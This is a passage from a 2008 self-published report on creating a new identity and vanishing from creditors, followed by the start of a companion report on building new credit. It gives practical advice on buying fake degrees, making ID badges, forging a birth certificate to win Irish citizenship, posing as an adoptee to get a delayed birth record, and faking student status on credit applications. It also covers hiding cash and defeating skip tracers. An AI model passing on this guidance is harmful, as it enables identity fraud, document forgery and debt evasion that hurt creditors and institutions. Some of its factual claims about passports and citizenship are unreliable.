accreditation is so new few employers have an +established policy. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 162 - +Reproduction in any form is prohibited without written permission. + +Crystal Cathedral Bust +Over the past few years a number of major religious schools +have been caught dealing in academic degrees. The usual +deal the churches have with state governments goes +something like this. They're allowed to organize schools and +grant as many degrees as they please without having to go +through the usual academic accreditation providing they only +grant degrees having to do with religion. Degrees in +theology, bible study, choir directing or ministerial degrees +are the usual fare. +But money-hungry churches often get entangled in the illegal +peddling of other more popular academic degrees. If a nice +member of their church, who has been a very generous +contributor to the building fund asks if they can't manage to +grant her a degree in accounting - they can't help but +consider her situation. After all, she has extensive +experience as a bookkeeper. +And there is the issue of the two kids she's trying to support. +The church may also be eager to get a fist full of her money. +The result? They quote her a price and then crank out a +degree and enter the necessary transcripts in their official +records. Of course all this breaks state laws but who is going +to spill the beans? Everyone gets what they want so what +can be wrong with that? +This situation may open the door for any degree-hungry +identity-changer. If you get into a rapidly-expanding +monetarily motivated church, you can never tell what kind of +degree you could end up with. The best schools for our +purposes are those who have bland names like "South +Wynfield College" instead of more religious sounding names +like "God the Supreme Creator College, in East Jesus North +Carolina". +If You Own a Computer +If you own a computer and a laser or inkjet printer, you may +want to consider purchasing a "desktop publishing" program. +Desktop publishing programs make it easy to quickly and +easily create all sorts of identity documents that appear very +genuine. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 163 - +Reproduction in any form is prohibited without written permission. + +The best one I know of is Microsoft’s "Publish". There are +more powerful programs out there but this one is by far the +easiest to use and does an excellent job. It can also be used +to create professional looking resumes, business envelopes +and even brochures and sales letters. +The program includes a long list of automated wizards that +can be used to create documents if you don’t wish to take +the time to learn the programs commands. They couldn’t +make it any easier. You tell the program exactly what you +want. And the program automatically creates the document +right in front of your eyes with little no intervention. And with +the improved print quality of today's inkjet printers, the +product can be extremely professional looking. +One guy I know used Publish to create several very +professional-looking "employee identification" badges and +cards. The first one took about an hour but once he created +the blank template, making additional versions took only a +few minutes. Ain't technology wonderful? +The Clothes Make the Man +Have you ever read the book or seen the movie - "Catch me +if you can" by Frank Abagnail? No? Get a copy as soon as +you can. The real-world hero of this story slipped into and +out of a half dozen entirely different identities over more than +a decade. His favorite was airline pilot. +He called the headquarters of a major international airline. +Posing as a pilot who had lost his uniform he obtained the +name and address of the airline's local contract tailor. He +then went to him with a sad story. He was an airline pilot +who had just come to town but had left his uniform in some +other city. +He's made this same mistake several times this year so he's +afraid he'll be fired if the airline finds out. Can the tailor bail +him out by quietly providing him with a new uniform? +He volunteered to pay any price in cash. In the end the tailor +made one up in only 24 hours and charged the entire cost to +the airline! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 164 - +Reproduction in any form is prohibited without written permission. + +When he put it on he quickly discovered the overwhelming +power of a uniform. He would get respect from everyone he +spoke with. The hotel hardly looked at his identification and +treated him like a king. He could easily cash checks +anywhere. +He flew all over the world for free (employees fly free on their +own airline). And he also found that a uniform can have a +really remarkable effect on the ladies. This guy flew all over +the world first class and had a ball. Is there a uniform in your +future? He then went on to pose as a doctor, and a college +professor! +The movie is great fun but provides almost no detail, but the +book has a full discussion of all the methods he used and +should be carefully studied by anyone interested in creating +and living under an assumed identity. +DMV Madness +For several years numerous DMV departments began selling +personal drivers license information to various commercial +firms. When asked - the beaurocrats would say that they +"restricted" the sales to "proper" buyers only. +But who are these "proper" entities? From what we've seen +it's anyone who has a few bucks. You can see why such a +practice would surface right now. States and counties are +hard-pressed for sources of income right now. Many states +are struggling with huge deficits and reluctantly cutting +budgets and laying off employees. So every possible source +of income must be fully exploited. +Well, all this idiocy backfired in a terrible way. TV actress +Rebecca Schaeffer was murdered by a fan who got her +address from the Los Angeles DMV. Because of this sad +incident, agencies all over the country quickly introduced +new restrictions. +Today, access is severely restricted. But it's far from private +so keep that in mind. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 165 - +Reproduction in any form is prohibited without written permission. + +Ready for a World Tour? +If you're interested in traveling or living overseas, you should +get a copy of "The world's most dangerous places" by +Robert Young Pelton. It'll give you some really interesting +things to think about. This guy has really scoured the globe +for interesting places. And what is the single most interesting +dangerous place in the world? The good old USA! It's listed +in the book right alongside all the backward banana +republics! +If you're really serious about living overseas, want complete +financial privacy and like hot tropical weather and white +sandy beaches - you might want to take a long look at +Belize. Belize used to be called British Honduras and is +located in the middle of the Yucatan peninsula. The banks +are very private (when you open an account they issue you a +MasterCard debit card that can be used anywhere in the +world). English is the official language. The locals are +friendly (though they'll steal anything that's not tied down). +You can set up a private corporation that can do anything +you'd like without anyone being able to find out who is +behind it's operations. +The cost of living is a small fraction of that in the US or the +Bahamas (you'd have to be a multi-millionaire to live in the +Bahamas). Real estate is still relatively cheap (though you'll +have to come up with a down payment of at least 35% if you +want a mortgage). And medical care is readily available and +costs around one-third the US price. +For $40,000 or so the government will issue you a Belizean +citizenship complete with an official passport in any name +you'd like. To sweeten the deal they'll also throw in a +Belizean driver’s license. Since Belize is a member of the +British Commonwealth, you can travel freely among the +nations of the old British Empire. +But be warned the place isn't for everyone. Be sure to pay +Belize a visit for at least two weeks to check it out if you're at +all interested. Some people can't take the heat, the lousy +phone service and the unimproved roads. The +communication system leaves a lot to be desired so high- +quality Internet access is probably a few years away. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 166 - +Reproduction in any form is prohibited without written permission. + +Think that buying a citizenship sounds like a sleazy and +corrupt practice that only a backward "banana republic" +country would offer? Most countries sell their +citizenships/passports. How do you think all those Nazi war +criminals got into the US right after the Second World War? +You can buy an Irish citizenship along with a passport and +drivers license for a whopping $1,650,000! (You can get one +for free if one of your grandparents was born in Ireland) If +either of your grandmothers was Jewish, you can always +become a citizen of Israel. France and Germany have similar +programs. +"Top of the Mornin' to Ya!" +When I was a teenager I had a friend named Tom. He was a +nice enough guy who I lost contact with after high school. +Some years ago I heard he had gotten himself into some +serious financial problems. In one of life's happy little +surprises I ran into a mutual friend recently. Eventually our +conversation got around to Tom and his current +whereabouts. +"Oh, yea - Tom started a business with a friend and the +bastard ran off with his wife and all the money in the +business. Tom was left holding the bag. Big legal and +financial problems he couldn't get out from under - even +though he tried for over a decade" When I asked what +happened, my buddy told me a very interesting story you +might just find amusing. +It seems that Tom reached the point that he just gave up. +Try as he might the problems just kept right on coming and +soon his debts had accumulated to the point he knew he +would never pay them off. With no end in sight Tom came up +with what I consider a really sneaky way out. He changed his +identity. He adopted a common Irish last name - like Sullivan +or Murray. He then forged a new birth certificate complete +with an "official" seal using the methods revealed above. +Now here is where it gets really interesting. He then used his +very official looking identity documents to convince the Irish +government that he was, in fact, a true and real son of the +emerald isle. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 167 - +Reproduction in any form is prohibited without written permission. + +Through an Irish genealogist he located some nice Irish +grandparents from Dublin (long since deceased of course) In +this way he qualified for an Irish citizenship and (and this is +the most important part) his very own brand new Irish +passport. (Ireland has a policy of granting citizenships to +those who can establish (on paper) their Irish ancestry). +Of course, obtaining a citizenship/passport using this method +would break some laws so I'll trust you to keep this +information a deep secret and never use it in any improper +way. And here is another interesting tidbit of information - +certain classes of Irish citizens are exempt from paying the +painfully high income taxes Ireland is famous for. (Artists, +writers, and other creative types) +Adopted People +There’s one group of people who face a unique problem. +People who were adopted as infants can run into a real +problem when they attempt to obtain a copy of their birth +certificate. +In most states the birth records are legally "sealed". This is +done to protect the biological parents from being contacted +by their offspring. Most adopted parents sign away their +parental rights and are eager to get on with their lives as if +the birth had never occurred. The courts recognize their right +to privacy and so keep the records under lock and key. +But today things are changing. Several states (including +Tennessee and Kansas) have recently opened up their +records. Courts there still recognize the original parent's +rights but have given priority to the adopted offspring's desire +to acquire information on their background. (Often this +information is needed for medical reasons) +Why am I telling you all this? Anyone who claimed to have +been adopted as a baby would find themselves in a rather +interesting position. If no birth certificate could be found in +the official record, they would be forced to apply for a +delayed birth certificate. +What makes this attractive is the simple fact that most vital +records offices tend to be sympathetic to the plight of an +adoptee. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 168 - +Reproduction in any form is prohibited without written permission. + +Most adopted people don’t have the usual birth certificate on +record. Depending on the state's laws, the clerks may or +may not provide access to the record. +And then there are those cases where the adopting parents +have altered the birth record (including the birth certificate) to +make it appear that their adopted child was, in fact, their +own. +Stay tuned, as it gets even more interesting. During the +period 1950-1973 thousands of Irish babies born out of +wedlock were shipped across the Atlantic to the USA. They +came from church-run "homes for unwed mothers" in Ireland. +Ireland is a very Catholic nation that looks down its nose at +illegitimate babies. +This can mean a lifetime of discrimination for those, who no +fault of their own, were born outside the confines of a proper +church sanctioned marriage. In America we have a much +more open-minded attitude concerning illegitimacy. +Unfortunately (for those people who arrived here in this way) +or fortunately (for our purposes) these individuals didn't have +any kind of birth certificate officially filed here in the US. Most +vital record offices know about these people and will usually +be accommodating when it comes to issuing a delayed +record of birth. +If you have a somewhat Irish appearance and/or surname, +you might want to consider joining this unfortunate pool of +individuals. These people are in an interesting situation as +they lack the usual background documents and may qualify +for a considerable degree of special treatment. It’s an +interesting story – don’t you think? +New Phone Traps +There are some new high-tech traps out there that you +should know about. Private Investigators and skip tracers +now employ some phone tricks that can cause you problems +if you don't know about them. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 169 - +Reproduction in any form is prohibited without written permission. + +First there is the "trap line". One of your relatives receives a +letter from some lawyer in a distant state that has a +substantial check for you but is having a problem locating +you to give you your loot. +The letter includes a convenient toll-free phone number for +you to call. If you do call, the number you're calling from is +immediately revealed and captured and used to locate you +and blow your cover. +And now for the really tricky stuff: You, or a close relative, +receives a really nice free gift. It's one of those prepaid toll- +free calling cards. You just dial the toll-free number on the +back of the card, enter the secret password on the card and +get an hour or more of entirely free long distance service. +It says it's good for 60 or 90 minutes of free long distance +calls. If you use it, both your number and the numbers you +call will be logged and revealed to the investigator who sent +it out. Either way you lose your privacy. +Wealth Mobility Update +On September 6, 1999 an American fugitive named Martin +Frankel was arrested in Germany where he had fled after +allegedly stealing a large sum (reports vary anywhere from +$100 million to over three billion) from investors and banks in +the US. Local police reported that his hotel room contained +around a hundred grand worth of gold and rare coins and +over $10 million in large diamonds. +Why the gold and the diamonds? US federal law limits +anyone from taking more than $10,000 out of the US without +a special permit. And because the US treasury no longer +prints bills larger than $100, it would be very difficult indeed +to carry around large sums of money. +In contrast, gold and diamonds are very liquid (they can be +easily sold for ready cash no matter where in the world you +happen to wander), are entirely untraceable and can be +used to easily store or smuggle large sums in very small +packages. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 170 - +Reproduction in any form is prohibited without written permission. + +Just after the communist revolution in Russia, the Czar and +his family were executed. The communists herded the entire +family into a small room and opened fire with an assortment +of firearms. Strangely it took a long barrage of gunfire to +finally do them all in. +When their clothing was searched it was found to be loaded +with jewels. Many were sown into the hems and down the +front seams of their coats. They had made their bodies +almost bullet proof by covering themselves in jewels! +Just before the murders the Czar had been clandestinely +arranging their escape to Switzerland where the jewels +would have come in very handy. So you can see that the use +of jewels as a portable form of wealth is not a new tactic. +Done right - its still quite effective. +Be careful however. Rookies eager to buy large investment- +grade diamonds for cash are obvious targets for fraud. Due +to recent advances in technology the diamond markets are +flooded with coated and treated "simulants" (fake diamonds) +that will pass most tests but are worth little or nothing. +Some diamonds have been injected with liquid glass, which +makes their internal flaws invisible. (Temporarily) +Others have been coated in a way that artificially improves +their appearance. Even the experts get fooled these days. +You don't want to buy a stone in location A that's declared to +be worthless when you get to location B. Sadly, this happens +all the time. Deal with reputable sources whenever possible +and never, ever go through customs with anything in your +luggage that might indicate an interest in jewels. If you do +your clothes and luggage will be torn to shreds by an +overeager customs inspector. +Store Your Stash! +Where should you store your cash stash and identity +documents until you're ready to skip town? The first thought +most people have is to run down to their local bank and rent +a safe deposit box. Wrong. There are all sorts of laws and +banking regulations that apply to safe deposit boxes. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 171 - +Reproduction in any form is prohibited without written permission. + +Any law enforcement type can flash a badge and gain +access. The mere fact that you have a box will be recorded +in several different databases under your name and SSN. An +online SSN verification will be required before a bank will +provide you a new box. +Though those nice people down at the bank appear +harmless enough on the surface, in today's emerging police +state they are key information sources for big brother. They'll +never tell you to your face but every time you move more +than a few hundred bucks around, they promptly report your +dealings to the feds (try searching the web for info on +"FinCen" for more details of federal banking monitoring). +They smile and speak to you politely - but they are not your +friends. +The best bet here is to use either a commercial box rental +firm where your box will be much safer from prying eyes or +better yet, your friendly local storage locker company. +You may be able to get full 24-hour access to your locker +and many of the storage locker outfits will also allow you to +use your own lock. If they don't, keep searching until you find +one that does. +Then go out and buy a really good lock. Consult with a local +locksmith. Some new high tech locks have recently hit the +market. They cost a bit more but will help ensure a higher +level of security for your stuff. +Master lock recently released new tamper resistant padlocks +that include a forged collar that covers most of the shackle +making it almost impossible to cut. I'm sure the government +will eventually require online drivers’ license verification at +some point in the future, but for now I've yet to hear of a +storage locker place that does. You should be able to rent +the locker using almost any kind of ID without too much +trouble. Just be very sure that their rental bill is paid regular +as clockwork. +Ask if they allow a discount for pre-payment, take advantage +of it. If you forget to pay, they will have the right to open your +locker and auction off your items, which would not be a good +idea. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 172 - +Reproduction in any form is prohibited without written permission. + +Never, ever claim your storage locker or safe deposit fee as +a deduction on your taxes. The IRS takes a special note of +such deductions. +When you rent your locker pay several months rent in +advance in cash and then after that pay by mail with money +orders. If the application asks for your SSN and/or license +tag number, be very careful about giving them the wrong +information. +Destroy the receipt or hide it somewhere away from your car +and residence where it will be safe. Hide the key in the same +manner or just add it to your key ring along with the others. +You can always claim to forget what the key was for. +Have no further contact with the staff. Come and go when +the front office is closed. Don't appear to be doing anything +that would arouse suspicion. Most of these places have +video cameras that scan each isle. There are those who +have removed the bulb that illuminates their rear license +plate to make vehicle identification more difficult. +Store your stuff in those letter sized document storage boxes +the office supply stores sell. Seal each box with wide +masking tape so that anyone who attempts to gain access +will leave telltale damage to the tape. Write "old business +records" or "Christmas lights" on the outside of the boxes. +This will discourage anyone who might gain access to your +locker. +If you want to you can store some cash and other +documents in your residence securely by simple wrapping +them in aluminum foil and writing "FISH" on the package +using a frozen food pen. Who would ever take the time to go +through the frozen good in your freezer? (You've heard of +cold cash haven't you?) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 173 - +Reproduction in any form is prohibited without written permission. + +More Big Brother Garbage +Update: The following restrictive policy has been +temporarily suspended until further notice: +Our dear friends in the US postal service have recently come +up with a diabolical scheme that will probably put the +commercial mailbox firms out of business. This new rule will +make it impossible to use a commercial mail box and have it +appear to be a normal street address. Instead your address +will have to include the letters PMB (Private Mail Box) +followed by your box number. +Old Format: (looks just like a street address) +John Jones +123 Main Street Suite # 67 +Anywhere, US 34567 +New Format: (is obviously a mail box) +John Jones +PMB #67 +123 Main Street +Anywhere, US 34567 +Under this new rule, any mail sent to one of those rented +mail boxes will have to be addressed in this federally +approved format or it will be returned to the sender. This +whole thing is just another useless government tactic. Think +about it - how many people know what PMB stands for? But +don't worry - I've received reports of a way to get around this +new restriction. +In a city of any size you will find outfits that rent small offices +for people who need a small working space on an occasional +basis. Of course these firms also handle their client's +business mail and phone calls. One lady I talked to +volunteered that she is getting quite a few requests these +days from commercial box users who are now interested in +renting an office so they can receive mail at a street address. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 174 - +Reproduction in any form is prohibited without written permission. + +As there's no rule against it, she has set aside one small +office in each of her locations for the use of these clients. +She charges a bit more than the commercial box rental +outfits, but can handle her clients mail without worrying +about the new PMB requirement. +Since her customers will be officially renting space from her, +they can go ahead and receive mail at the office's street +address. She now has over forty different people sharing a +single office! So now her most profitable office is the one +that's never used! +The French Foreign Legion +Don’t laugh – the French Foreign Legion is a serious option for +those who have problems they want to leave behind. Since 1831 +the Legion has been there for misfits who needed to walk away +from their past problems. +On the positive side – you get a completely new identity along with +a new French passport. On the negative side, you’ll be subjected +to the toughest military training on earth – bar none. +Most people assume the Legion went out of business long ago – +but they’re wrong. Today the Legion has almost 8,000 men under +arms in a dozen different locations and another dozen that are +kept very secret. +The Legion has always been there as an option to those who +passionately desire a second chance at life. It’s a unique military +outfit as it’s the only one in the world whose soldiers are not +bound together by a single national flag. Legionnaires come from +over 130 different nations with the only nation barred from +membership being the French themselves. (If you are French and +wish to join the legion you’ll have to change your identity and +citizenship first.) +To say that the Legion basic training is tough is a vast +understatement. The following should give you some idea of the +attitude legionnaires have to adopt before becoming part of this +elite group. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 175 - +Reproduction in any form is prohibited without written permission. + +You’ll certainly never hear anything like this in the US Marine +Corps. +Sergeant: Do you men want to die? +Legionnaires: Yes, Sergeant! +Sergeant: Good, I shall send you someplace where you +can die! +Legionnaires: Thank you, Sergeant! +Legionnaires are foreigners, so the French don’t really care if they +live or die. To them these troops who are all foreigners are +completely expendable. The government of France routinely +sends in the Legion before the French army to help reduce French +casualties. In a way the Legion is cannon fodder for the French +military. Statistically your odds of dying during your five year long +hitch hover around 10-15%, or perhaps a bit higher these days +now that there is so much war and terrorism going on. +When you apply to join you will get a personal interview with a +Legionnaire officer who will ask you the obvious question “Why do +you want to join the French Foreign Legion?” +You should have an answer ready. If you have a past you’d like to +leave behind, you should make that known during the interview. If +you’ve had problems with the law, spell them out – they take +criminals on the run provided their crimes aren’t too horrible. +(Convicted felons will probably be refused entry – but not always.) +Minor debts will be ignored. +The US military routinely rejects applicants who have had problem +with the law. If you have a long rap sheet - the Legion may be +your new home. Though the good old days of “no questions +asked” are sadly behind us their investigation isn’t all that severe. +Today you’ll have to undergo a series of interviews by what the +Legionnaires call “the Gestapo” but their rules are still rather +liberal compared to those of other nations. +After three years of good service you will be allowed to, if you +should so desire, apply for French citizenship. You don’t have to +speak French to join as you will be taught the language but it +would be a good idea to learn some smattering of the lingo before +you enter basic training. +Also, since the Legion isn’t bound by the patriotism of a single +nation, they replace that unifying factor with a strong sense of +family that is deep and very real. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 176 - +Reproduction in any form is prohibited without written permission. + +Once you go through all that demanding training, you will bond +with your Legion brothers in a way that’s hard to explain. Their +varied nationalities will fade as they become full members of a +very tight team. +The motto of the Legion is simply “Lego Patria Nostra” which +translates to “the Legion is your country”. And it’s also your family. +They even have their own retirement home (a villa in the south of +France actually) where you can reside until death should you +complete a full contract. +If the Gestapo feels it’s necessary, they will hand you a form with +a new name. You will be asked if that meets with your needs. If +you answer in the positive you will be asked to sign the form. +From that moment forward your old identity no longer exists. You +will be addressed in person and on paper under your new +Legionnaire name. +Should any outsider make inquiries about you by your old name, +they will run into a solid brick wall of privacy. They will receive +back a formal reply simply stating that according to official records +no such legionnaire exists. +If you are still alive when your 5 year long contract expires, you +will be asked to make a decision: +1. You can discard the Legion name you’ve used during your +contract and choose to reclaim your old original name. Your +passport (which you surrendered the day you entered the +Legion) will be returned to you along with any other identity +documents the Legion may have. The Legion calls this +process rectification. +2. You can choose to abandon your old identity and permanently +adopt your Legion name as your new civilian name. You will +surrender your old passport and other identity documents and +will be issued new ones including a genuine French passport +all bearing your Legion name. This is provided in recognition +of your service to France. +Why would anyone want to join the Legion? The classic answer is +that men join the Legion to forget. +Q: Why did you join the Foreign Legion?” +A: I joined to forget! +Q: Forget what? +A: I forgot. See, the system works! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 177 - +Reproduction in any form is prohibited without written permission. + +But make no mistake – the Legion is a tough way to go. The +training is terribly, terribly difficult. The basic training can take up +to 4 long months. If you relish the idea of making a 50 Kilometer +march through the desert to the sea wearing a full uniform +including combat boots and a rifle including a 30lb pack on your +back – and get this – without any food or water - the Legion may +be your cup of tea. +In order to encourage mental and physical toughness, during your +basic training you’ll eat an extremely meager diet, sleep in hot or +cold barracks (with or without luxuries like blankets) and be forced +to make long marches after long days of no sleep. Toughness is +the key goal of their training program. They will push you to your +physical and mental limits – and well beyond. +At the end of their basic training the legionnaires make the 50km +long hire to the sea. Those who make it are awarded the widely +respected tall cylindrical white hat know as the “Cape Blanc” +(White Hat). When I see a Legionnaire wearing that tall white hat, +I’m filled with respect. They don’t hand hats like that out in boxes +of breakfast cereal! These guys are real men. +Married and single men are accepted but they can only enter as +single men. Only established Legionnaires are permitted to wed +but that comes later – several years later. For the first few months +you won’t even be allowed to make outside phone calls. You will +be relieved of your family photos when you arrive. Why would you +need them anyway? The Legion is your new family. Your fellow +legionnaires are your new brothers. Your commander is both your +new father and mother. +If you fail to adopt the right attitude or fail to learn your lessons +quickly enough – you can expect to suffer blows. If you persist you +will be beaten or imprisoned or both. (Their prison cells have no +beds – you sleep on the hard floor.) +Some men have been beaten to death which really isn’t much of a +problem for the Legion as the men had legally vanished from the +world when the joined up so no one was terribly concerned with +their well-being. However there are signs that the old Legion +brutality is under review these days. All this harshness flows from +their need to train soldiers who never surrender and instead swear +to fight to the last man. +Americans find four years in the US Marine Corps an ideal +preparation for the grueling Legion basic training. One thing for +sure – You’d better be in really excellent physical shape when you +show up for your Legion basic training. And get a nice short +haircut also. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 178 - +Reproduction in any form is prohibited without written permission. + +Since the Legion hangs out in African desert locations, you might +want to spend some time in the heat and get used to being +extremely physically active in 100 degree plus environments. Oh, +and be sure to do this training with little or no water as that is the +Legion way. +Only those who are burning with what they call “warrior lust” need +apply. If you complete a five year long contract chances are +excellent that you’ll see some action – most likely in a North +African desert location. If you passionately want some real +adventure – look into the Legion. +Before you consider the Legion, be sure to talk to a recruiter and +get official information and guidance as the Legion is changing +with the times. They are even considering taking in women which +shows you just how much change is in the air. +You’ll want to have the very latest facts in hand before you make +such a drastic obligation. Desertion rates are high in the Legion as +far too many men join before they fully understand exactly what +they’re getting into. +How They Find Us +There are a host of folks who may be looking for you. First +there are the common skip tracers. If you left behind some +bills, you can bet they’ll be on your trail. +If you left behind some real debt, say over $5,000 or more, +you can expect them to be hot on your trail. +If you leave behind truly huge debts, you can expect that +some rather professional and experienced private +investigators will be looking for you. +Then you have the repo men. If you took your car without +bothering to make your payments, they will join the game. +Whatever their motivation they all share some common +strategies so in an effort to educate you and make you all +that more effective at vanishing, here is a cram course on +how these persistent snoops operate. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 179 - +Reproduction in any form is prohibited without written permission. + +411 +The first step is a call to 411 to see if you have a current +phone number listed. If you need a phone, buy a prepaid +cellular, use it for several months and then fling it into the +sea and buy another. Or at least get an unlisted phone and +keep the number to yourself. +Your Credit File +They get a copy of your most recent credit file. What they’re +looking for are credit accounts with the most recent activity. +They can call the firm and offer to share their notes in +exchange for more recent information on their target. +Check the Reverse Directory (Haines) +If you’re listed they may get your new address though these +directories aren’t supposed to have unlisted numbers in +them, they sometimes do. +Address Service Requested +Next they send you a letter with “Address Service +Requested” on it. If you have moved and left a forwarding +address with the post office, the letter will come winging +back with your new address written across it’s face. +Call Friends, Family Neighbors and Personal References +They then “pump” those who know you for info. They may +use various pretexts to flush you out. They may call your +sister and tell her that they have a huge check for you but +can’t quite locate you. If she isn’t in on what’s going on she’ll +happily hand over your current address and a lot more. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 180 - +Reproduction in any form is prohibited without written permission. + +Hit the Public Record Services +Most of these databases are available online so today it’s +much easier than in the past. One of their tricks is to keep +checking the DMV records of parking tickets. +If you get a parking ticket, it may list your home phone or +address that will lead them directly to you. (so choose your +parking spaces very carefully!) +Lastly, They’ll Call Other Creditors +Many creditors will exchange information with other snoops. +Most will share some information while others are real +blabbermouths. A few won’t entertain such calls. But the +skip-tracer who has info to offer will probably get some info +in return. +Sorry, We Don't Do Fake ID! +We get a steady flow of email asking us to provide various +kinds of fake identification documents. We are not in that +business nor do we know anyone who is. Our only business +is the publishing of reports that contain controversial +information. +That’s It! +At this point I can only hope that the information in this report +will help empower you to seize control of your own destiny. +You now have everything you need to give yourself a second +chance at life. One final tip: When you start living your new +life - KEEP YOUR MOUTH SHUT ABOUT YOUR OLD LIFE! +This is the most common way to destroy all that you’ve +worked to create. Don’t blow it! Good luck. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 181 - +Reproduction in any form is prohibited without written permission. + +Welcome to the New World Order! +Until recently my wife and I have been happy to assist new +identity-seekers in any way we could. We know what it’s like +to have personal problems and can certainly sympathize +with those of you that are going through difficult times. +Unfortunately, recent court decisions and legislation +(Particularly the so-called Patriot Act) have made it +impossible for us to provide personal assistance of any kind. +We can no longer help our customers or even answer +questions sent to us via email. According to these +increasingly restrictive court decisions, answering a question +for someone would automatically expose us to criminal +prosecution for any illegal act they might have committed in +the past. +Our attorney has advised us not to provide assistance to +anyone. No exceptions - so please don't ask. It seems we're +living in a police state these days. +We deeply regret having to take this drastic step but until the +government abandons it’s police state tactics we really don’t +have any option. +- Jim & Susan Petersen 2008 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 182 - +Reproduction in any form is prohibited without written permission. + +OTHER TOP SECRET REPORTS +AVAILABLE FROM ARIZA RESEARCH +WEALTH SECRETS OF THE RICH NEW! +Most people don’t even know that these secret wealth-making +tactics exist! We’ll give you a rare look behind the scenes where +you’ll discover wealth secrets never before released to the general +public. Learn how the rich REALLY made their money. It will +surprise even shock you! Armed with this previously secret +information you’ll be able to quickly and easily make money by +copying their same methods! +DUMP YOUR DEBT NEW! +Clever lawyers know how to live like kings. When their debts pile +up, they use debt negotiation to wipe them away – quickly and +permanently. Why struggle with credit card and other debts when +you don’t have to. 100% Legal! +PRIVACY SECRETS OF THE RICH AND FAMOUS +Some experts will tell you that personal privacy is dead. Don’t you +believe it! While technology has provided big brother with new +surveillance technologies - that same technology can be used to +confound the snoops and build an iron-clad privacy fortress +around your own personal and financial privacy. 100% total +privacy is still possible – if you know how! +www.ariza-research.com +© Copyright 2008, Ariza Research, All rights reserved - ABP - 183 - +Reproduction in any form is prohibited without written permission. + +Quick Credit Creation +by Jim & Susan Petersen +© Copyright 2007 – Ariza Research – All Rights Reserved - ABP +Disclaimer: +Do not break the law. This publication is being sold for academic, +educational and entertainment purposes only. Nothing in this publication +is intended to encourage illegal or immoral acts now or at any point in the +future. Always consult with an attorney familiar with laws in your local +area before attempting to employ any of the techniques discussed in this +report. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 184 - +Reproduction in any form is prohibited without written permission. + +Establishing an Entirely New Credit Record +Student Credit Cards +For many people, their first experience with credit comes when +they arrive at a college. The credit industry knows this and is +eager to get these new consumers into their system as quickly +and easily as possible. +The credit card banks also know that college students have little +income so they may run up some debts which will give the banks +an opportunity to earn some interest. +The banks also know that these students will in a few years move +into positions that will provide them with above average earnings. +Because of these factors credit card banks are particularly +motivated to locate college students and get new cards into their +hands. This creates an interesting opportunity for anyone who +seeks to create a new credit file. +If you wander around any college campus you’ll find posters with +holders full of applications for student credit cards. If you fill out +one of these applications and make it looks as though you’re a +new college student, you’ll get a major credit card and a rare +opportunity to create an entirely new credit file. +Here is a real back door into the world of credit. College students +are a special market for credit card banks. Though college +students don’t have much money, the banks know that they have +parents who love them and will, with rare exception, back them up +financially so the credit card issuers are particularly liberal when it +comes to issuing cards to college students. +Also, the banks presume that spending habits established during +these years may become permanent later so getting their credit +card into a student’s hands is a real priority. +Then there is the issue of income. Most any normal bank credit +card will want to see employment and income before opening an +account and issuing a card. But with students the rules are much +different. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 185 - +Reproduction in any form is prohibited without written permission. + +The banks know that the student’s income will be at or near zero +now but will increase later after graduation. So they’re willing to +issue major credit cards to people who have no current income. +This is a very unusual kind of financial deal – one you can easily +take advantage of. +And here is a real irony. Many college students find that it much +more difficult to get a major credit card after graduation when their +pulling down substantial salaries than before when they’re stone +broke! Who said financial dealings have to make sense? +You have two strategies here. You could enroll in a college course +and then wander around the campus keeping your eyes open for +those special college student credit card applications. Get several +applications and compare them and find the one that offers the +best deal. +You can then fill one out listing your school on the application. You +could also cheat the whole system by just getting the application +and filling it out without bothering with enrollment. +The student cards usually come with high annual fees, high +interest rates and low credit limits. But why should you care, they +are real bank credit cards that can be used to create a new credit +file! +The Easy-to-Get Debit Card +If you need a major credit card, nothing can beat the "debit" card. +Many banks offer debit cards that look and work just like a +genuine Visa or Mastercard with one critical exception. They are +not credit cards but are instead debit cards. +When you purchase something with one of these cards, instead of +adding the sum to your account and sending you a bill, the bank +just subtracts the purchase amount directly from your checking +account. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 186 - +Reproduction in any form is prohibited without written permission. + +If there aren’t enough funds in your account to cover the +purchase, the transaction is immediately refused right there at the +store. +Using one of these cards is exactly like writing a check except that +they’re much more acceptable to the merchant as they can be +instantly verified which protects the merchant against taking a bad +check. And the banks like them because they can charge both the +purchaser and the merchants a separate group of fees. +Because there’s no real risk involved in their use, debit cards are +quite easy to get. Some banks don’t bother with a routine credit +check, as they don’t see much risk here. What have they got to +lose? +You may have to call several banks but you should be able to find +one that will give you their debit card without much fuss. You open +a checking account and they provide you with a debit card with +either the Visa or MasterCard logo. +As easy as these cards are to get, they do have several +limitations. Some of the car rental companies no longer accept +debit cards, so renting a car with a debit card may be a problem. +(They can tell a debit card from a real credit card by a coded digit +in the card’s number.) +The most important thing about debit cards is that they don’t +report your credit transactions to the three biggest credit reporting +agencies so debit cards are of no value whatever when it comes +to rebuilding your damaged credit rating. +The Secured Credit Card +Another approach is to go after a "secured" credit card. Again, +these cards look and work just like real Visa or MasterCards but +have a catch. In order to get one, you must deposit a required +minimum sum in a savings account with the issuing bank as +security. +They usually pay a nominal interest on your savings account +usually around 3%. Unlike debit cards, if you shop around you will +probably find a card that reports your payments to the three major +credit reporting agencies – but you’ll have to look around. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 187 - +Reproduction in any form is prohibited without written permission. + +This can help you quickly and easily rebuild a battered credit +history or create an entirely new credit record from 